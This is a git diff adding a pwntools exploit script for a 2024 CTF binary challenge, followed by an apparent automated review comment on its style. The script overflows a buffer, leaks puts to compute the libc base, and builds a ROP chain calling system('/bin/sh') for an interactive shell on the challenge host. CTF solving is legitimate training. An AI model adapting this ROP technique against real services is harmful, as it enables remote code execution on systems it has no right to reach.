diff --git a/4ts_ctf_2024/pas_ouf/b.py b/4ts_ctf_2024/pas_ouf/b.py
new file mode 100644
index 0000000..7f00254
--- /dev/null
+++ b/4ts_ctf_2024/pas_ouf/b.py
@@ -0,0 +1,41 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
+# r = process()
+r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*272
+buf += p64(0x404118)
+buf += p64(0x40129e)
+buf += b"A"*280
+buf += p64(target.sym.main)
+s(buf)
+
+# leak
+r.recvuntil(b"@\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc = puts - 0x80e50
+log.info("libc: %#x", libc)
+system = libc + 0x50d70
+sh = libc + 0x1d8678
+
+# gadgets
+pop_rdi = libc + 0x2a3e5
+
+# pop
+buf = b"A"*280
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file
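Review bot: The `process(...)` call on the `r = process(...)` line passes a single command string with `shell=True`, which routes the openssl invocation through a shell for no benefit; pwntools' `process` accepts an argument list, so `r = process(["openssl", "s_client", "-quiet", "-verify_quiet", "-connect", "<host:port from the original line>"])` keeps every argument explicit and drops the shell layer. The commented-out `# r = process()` line above it is dead code and should either be removed or turned into a proper local/remote switch. The file also ends without a trailing newline, as the diff marker shows.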